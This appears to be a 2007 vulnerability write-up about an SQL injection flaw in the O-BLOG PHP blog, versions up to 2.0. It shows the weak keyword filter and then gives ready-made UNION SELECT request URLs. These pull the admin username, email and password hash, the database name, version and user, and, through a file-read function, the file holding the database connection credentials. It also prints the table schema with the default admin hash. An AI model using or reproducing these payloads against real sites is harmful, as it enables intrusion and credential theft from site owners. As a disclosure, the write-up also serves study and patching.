O-BLOG checkSQL insufficient-filtering vulnerability


Date: 2007-06-02
First of all, thanks to the brothers who helped me: big brother Yunshu, superhei and kevin1986. Without you I would still be a newbie. :)

Vulnerability discovery date: 2005.7.1
Affected versions: O-BLOG Version <= 2.0
Official website: http://www.phpBlog.cn
Vulnerability analysis and exploitation:

config.PHP
----------------------cute divider (stolen from wofeiwo)-----------------------------
[codz begin]
function checkSQL($content)
{
    $char = array("'", "or", "and"); // filtering is not strict: only three substrings are blocked
    // strstr() is case-sensitive, so "OR" or "Or" slips past, and SQL keywords
    // such as union/select are not on the list at all
    for ($i = 0; $i < count($char); $i++) {
        if (strstr($content, $char[$i])) {
            die();
        }
    }
    return $content;
}

[codz end]
----------------------cute divider-----------------------------

blog.php
----------------------cute divider (stolen from wofeiwo)-----------------------------
[codz begin]


if(isset($_GET['do']))
{
$ac = checkSQL($_GET['do']);

if($ac == 'showclass')
{
@$classid = checkSQL($_GET['classid']);
require('class/show_one_class.php');
}
elseif($ac == 'ShowOneDayBlog')
{
@$date = checkSQL($_GET['date']);
require('class/show_one_day_blog.php');
$main = $OneDayBlogData;
}

...............

[codz end]
----------------------cute divider-----------------------------

We can bypass the check by changing case, using union and so on, and read the sensitive information in the ob_admin table.
The table structure is as follows:
------------------------------------------------------

// create table ob_admin
$sql[] = "CREATE TABLE `ob_admin` (
`username` varchar(15) default 'admin',
`passWord` varchar(40) default '21232f297a57a5a743894a0e4a801fc3',
`email` varchar(100) default '[email protected]',
`homepage` varchar(100) default 'http://shirui.org',
`QQ` varchar(30) default '5194913',
`MSN` varchar(100) default '[email protected]',
`icq` varchar(100) default '123456789',
`remark` text
) TYPE=MyISAM;";

// import data into ob_admin
$sql[] = "INSERT INTO `ob_admin` VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3', '[email protected]', 'http://shirui.org', '5194913', '[email protected]', '123456789', '这家伙很懒，什么都没留下.');";
-----------------------------------------------

Obtaining user data:
Get the e-mail: /blog.php?id=1%20union%20select%201,1,1,email,1%20from%20ob_admin
Get the username: /blog.php?id=1%20union%20select%201,1,1,username,1%20from%20ob_admin
Get the password (md5-hashed): /blog.php?id=1%20union%20select%201,1,1,PASSWORD,1%20from%20ob_admin
Note: password must be written in uppercase here. I have not found the reason either; if you know it, please tell me. Blog: http://wmjie.51.net/swords/

Obtaining database data:
Get the database name: /blog.php?id=31%20union%20select%201,1,1,database(),1%20from%20ob_admin
Get the database version: /blog.php?id=31%20union%20select%201,1,1,version(),1%20from%20ob_admin
Get the current database user: /blog.php?id=31%20union%20select%201,1,1,CURRENT_USER(),1%20from%20ob_admin

Obtaining sensitive file data (the physical path must be known; path is the physical path of the root directory):
/blog.php?id=31%20union%20select%201,1,1,loadfile('/path/blog/admin/mysql.php'),1%20from%20ob_admin

(kevin1986: it seems that non-root users have no file-read privilege by default)
admin/mysql.php holds all of the database connection information!

(Source: http://www.sheup.com)
